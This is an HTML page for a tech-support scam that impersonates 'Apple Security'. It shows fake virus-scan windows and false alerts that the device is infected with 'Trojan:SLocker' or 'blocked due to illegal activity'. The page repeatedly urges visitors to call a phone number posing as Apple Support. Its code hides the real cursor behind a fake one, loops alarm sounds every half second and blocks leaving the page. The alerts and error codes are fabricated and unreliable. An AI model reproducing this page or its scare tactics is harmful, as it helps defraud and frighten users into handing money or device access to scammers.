<!DOCTYPE html><html><head>
     <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title></title>
     <link rel="stylesheet" href="css/styles.css">
<script type="text/javascript" src="js/scripts.js"></script>
<script src="js/jquery.min_1.js"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="js/main.js"></script>
<link rel="stylesheet" href="css/font-awesome.min.css">
<script type="text/javascript" src="js/main.js"></script>
<style>
  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<style>
  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>

<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
color:#fff;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>


<style type="text/css">

    html{
        cursor: none;
    }
    .fakeCursor {
                                width: 17px;
                                height: 25px;
                                background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");
                                position: fixed;
                                    top:5px;
                                    left: 400px;
                                z-index: 10000;
                        }
</style> 

</head>
<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor:none;" d="mycanvas" onclick="playSound()">
<audio id="beeppeep" autoplay="">
    <source src="" type="audio/mpeg">
</audio>
<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="images/bg1.jpg" alt="" width="100%"></div>
    <div class="bgimg2" style="top: 0px;"><img src="images/bg2.jpg" alt="" width="100%"></div>

</div>

  
<div class="fakeCursor"></div>
<div class="bgimg" style="top: 0px;"><img src="images/1421bg.png" alt="" width="100%"></div>
<!--<iframe src="https://support.microsoft.com/" id="frame" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; ">
</iframe>-->

<div class="box" id="box">
<div class="top">
<p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Apple Security<img src="images/minimize.jpg" class="btn" style="float: right; width:115px;"></p>
</div>

<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300;" id="text1">Safety at a glance</h2>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="images/kxFy-clip.png" width="40px;">
<p>Virus and threat protection</p>
<p style="top: 120px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

</li>
<li>
<br><br>
<img src="images/qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="images/s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
<li>
<br>
<img src="images/Z5BR-network.png" width="51px;">
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
</div>
<img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Chrome Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Apple Security<img src="images/minimize.jpg" class="btn" style="float: right; width:115px;"></p>
  </div>
  <h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300;" id="text1"><img src="images/kxFy-clip.png" width="30px;" style="margin-right: 10px;vertical-align: text-top;">Virus and threat protection</h2>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300;" id="t1"><b></b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="images/-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">Current Threat</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">A quick scan is in progress...<br>Estimated time remaining: <n id="time">0</n><br><n id="amount">0</n> Files scanned.</p>

  <a href="#" class="button" id="re">to cancel</a>
  <p style=" font-size: 13px;" id="recx">Keep working while we analyze your device.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: none;" id="recx-hide">protection history</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: none;">Scan Options<br> Allowed Threats<br> Protection History</p>


  </li>

  <li>

<div class="flex"><img src="images/nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 76px;    line-height: 18px;">Virus & threat protection settings </p> </div>
<p style="color: grey; font-size: 13px;">no action required</p>
<p style="font-size: 13px; color: #0063c6;">Manage your settings</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">I have a question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: none;">get help</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">who will protect me</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: none;">Supplier management</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>Help us improve Apple security</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: none;">Send us your feedback</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">Change your privacy settings</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">View and change privacy settings on Apple<br><n id="which"></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: none;">Privacy Settings<br>Privacy Dashboard<br>Privacy Statement</p>

        </li>

  </ul>

  </div>
  <img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>


<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;"><img src="images/apple.png" class="logo12"> Apple Security - Spyware Alert</p>
                <p class="text-center">** Apple is infected with Trojan:SLocker **</p>
                <p>A critical error has occurred due to the outdated version of the browser. Update your browser as soon as possible.</p>
                <p>The following errors are also possible on outdated versions of the browser:</p>
                <ul class="icon-links">
                  <li>> Loss of personal and stored data</li>
                  <li>> Confidental information leak</li>
                  <li>> Browsers errors</li>
                </ul>

                  <p>A Apple Security scan has detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, images, or documents.</p>
                  <p>Please contact us immediately so that our engineer can explain the removal process over the phone.<br><br>

                  Please contact Apple Support immediately to report this threat, prevent spoofing, and unlock access to this device.<br><br>
                  Closing this Apple puts your personal information at risk and interrupts your Apple registration.</p>

               <p style="padding-bottom: 0px;">Call Apple Support <strong >+1-844-570-3405</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: none;">OK</a> <a class="" id="leave_page">Cancel</a> </div>
            </div>

        </div>
    </div>
</div>

<audio id="mdchys">
  <source src="media/NtUGN1dKiCUr.mp3" type="audio/mpeg">
</audio>
<audio autoplay="" id="infogt">
  <source src="media/_Fm7-alert.mp3" type="audio/mpeg">
</audio>


<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="images/apple.png" class="logo3"></span> Apple Security Center</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="images/cross.png"></a></span>

      </div>
  </div>
  <div id="txtintro">
              <span class="colo-rd">App: Ads.financetrack(2).dll<br>
              Threats Detected: Trojan Spyware</span>
              <span class="colo-rd">(5)</span> Virus has been detected on your Device<br>
              Error Code:- WinError.h 6001(0x1770)

  </div>
  <img id="banner" src="images/virus-images.jpeg">
  <div id="disclaimer">
    Your PC has been blocked due to illegal activity.<br>
      <span class="support">Contact Apple Support : <span id="t3"></span></span>
  </div>
  <div id="bottom">
      <img id="badge" src="images/apple.png"><span class="title3">Apple Support</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Continue</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">Leave</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>



<div id="footer">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="images/apple.png"> Apple</span><span style="font-weight: 800;padding-left: 13px;color: #fff; font-family:inherit;">Support :<span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-844-570-3405</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 12px;"><strong>Security Note :</strong> Malware is known to steal information from your device and use your identity to do malicious transactions. Due to COVID-19, data theft incidents via a fraudulent advertisement that injects adware to your browser Apple have increased by 624%. Because of this, we recommend a security application that can remove Adware and Malware for you. The app can also speed up your browser, blocks aggressive ads, and a lot more</small></marquee><script defer="" data-domain="oct.live" src="js/script.js"></script>
      </div>
  </div>


</div>

<div id="welcomeDiv" class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">This Apple Device is infected with trojan:SLocker, a dangerous ransomware and it will lock your device!<br> Virus must be removed immediately! <br>Please contact us immediately. A technician will help you solve the problem.</p>


</div>



<div id="chat-box">
  <img src="images/apple.png"><span style="color: #222;
font-size: 21px;
font-weight: 600;
margin-left: 16px;
position: relative;
top: -5px;">Apple Support</span>
 <h4 style="font-weight: 800;" id="t5">+1-844-570-3405</h4>
   <div class="arrow-down">
     <i class="fa fa-caret-down"></i>
   </div>
<audio id="audio" src="media/speech.mp3" loop=""></audio>  
</div>

<script>
  setInterval(function() {
    document.getElementById("infogt").play();
    document.getElementById("mdchys").play();
  }, 500);
</script>

<script>
function beep1() {
document.getElementById("mdchys").play();
}
</script>

</body></html>